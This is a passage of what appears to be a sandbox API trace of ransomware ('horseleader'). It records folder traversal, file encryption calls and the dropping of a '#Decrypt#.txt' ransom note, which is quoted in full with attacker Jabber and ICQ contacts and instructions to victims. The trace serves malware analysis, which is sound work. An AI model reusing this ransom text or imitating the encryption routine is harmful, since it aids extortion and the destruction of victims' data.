cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui") returned 76 [0234.234] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.234] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.234] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.234] lstrlenW (lpString=".testttjffg") returned 11 [0234.234] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.234] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.234] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.235] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.235] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.236] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\#Decrypt#.txt") returned 74 [0234.236] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.236] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.236] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.238] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.238] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.238] CloseHandle (hObject=0x158) returned 1 [0234.238] GetProcessHeap () returned 0x780000 [0234.238] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.238] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0234.238] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0234.238] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned 60 [0234.238] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0234.238] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0234.238] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.238] GetProcessHeap () returned 0x780000 [0234.238] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.238] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*") returned 62 [0234.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.239] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\.") returned 62 [0234.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.239] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\..") returned 63 [0234.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.239] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.239] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned 76 [0234.239] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.239] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.239] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.239] lstrlenW (lpString=".testttjffg") returned 11 [0234.239] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.240] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.240] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.240] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.240] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.240] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.240] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\#Decrypt#.txt") returned 74 [0234.240] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.241] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.241] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.242] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.242] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.242] CloseHandle (hObject=0x158) returned 1 [0234.243] GetProcessHeap () returned 0x780000 [0234.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.243] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0234.243] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0234.243] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned 60 [0234.243] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0234.243] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0234.243] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.243] GetProcessHeap () returned 0x780000 [0234.243] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.243] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*") returned 62 [0234.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.244] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.244] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\.") returned 62 [0234.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.244] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.244] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.244] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\..") returned 63 [0234.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.244] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.244] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.244] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned 76 [0234.244] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.244] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.244] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.244] lstrlenW (lpString=".testttjffg") returned 11 [0234.244] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.244] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.245] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.245] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.245] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.245] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\#Decrypt#.txt") returned 74 [0234.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.245] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.245] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.246] lstrlenA 